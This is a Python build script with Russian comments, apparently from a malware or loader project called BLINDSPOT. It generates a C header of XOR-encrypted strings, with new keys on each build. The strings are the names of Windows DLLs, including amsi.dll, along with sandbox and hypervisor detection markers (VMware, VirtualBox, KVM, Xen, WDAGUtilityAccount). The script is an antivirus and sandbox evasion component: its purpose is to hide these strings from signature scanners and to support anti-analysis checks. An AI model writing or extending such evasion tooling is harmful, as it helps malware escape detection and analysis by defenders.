# core/string_crypt.py
# Генерирует strings.h с зашифрованными критичными строками.
# Каждая сборка — новые ключи и новые зашифрованные байты.

import random
from pathlib import Path


# Строки, которые обязательно шифруем.
STRINGS = {
    "ENC_KERNEL32":  "kernel32.dll",
    "ENC_NTDLL":     "ntdll.dll",
    "ENC_USER32":    "user32.dll",
    "ENC_AMSI":      "amsi.dll",
    "ENC_WS2_32":    "ws2_32.dll",
    "ENC_ADVAPI32":  "advapi32.dll",

    "ENC_WDAG":      "WDAGUtilityAccount",
    "ENC_SANDBOX":   "sandbox",
    "ENC_MALWARE":   "malware",
    "ENC_VIRUS":     "virus",

    "ENC_VMWARE":    "VMwareVMware",
    "ENC_VBOX":      "VBoxVBoxVBox",
    "ENC_KVM":       "KVMKVMKVM",
    "ENC_XEN":       "XenVMMXenVMM",
}


def random_key() -> int:
    return random.randint(1, 254)


def xor_encrypt(s: str, key: int) -> bytes:
    return bytes(b ^ key for b in s.encode("utf-8"))


def to_c_array(data: bytes) -> str:
    return ", ".join(f"0x{b:02X}" for b in data)


def generate_strings_header(output_path: Path):
    """Генерирует strings.h."""
    lines = []
    lines.append("// Auto-generated by core/string_crypt.py — do not edit")
    lines.append("#ifndef BLINDSPOT_STRINGS_H")
    lines.append("#define BLINDSPOT_STRINGS_H")
    lines.append("")
    # Относительный путь от build/generated/ до src/common/types.h
    lines.append('#include "../../src/common/types.h"')
    lines.append("")
    lines.append("// Расшифровка XOR-строки в буфер.")
    lines.append("static void decrypt_string(char* dst, const u8* src, u32 size, u8 key) {")
    lines.append("    for (u32 i = 0; i < size; i++) dst[i] = (char)(src[i] ^ key);")
    lines.append("    dst[size] = 0;")
    lines.append("}")
    lines.append("")

    for name, s in STRINGS.items():
        key = random_key()
        enc = xor_encrypt(s, key)
        arr = to_c_array(enc)
        lines.append(f"// \"{s}\" XOR 0x{key:02X}")
        lines.append(f"static const u8 {name}[] = {{ {arr} }};")
        lines.append(f"#define {name}_KEY  0x{key:02X}")
        lines.append(f"#define {name}_SIZE {len(enc)}")
        lines.append("")

    lines.append("#endif")

    output_path.parent.mkdir(parents=True, exist_ok=True)
    output_path.write_text("\n".join(lines), encoding="utf-8")


if __name__ == "__main__":
    project_root = Path(__file__).parent.parent.resolve()
    out = project_root / "build" / "generated" / "strings.h"
    generate_strings_header(out)
    print(f"[+] Generated: {out}")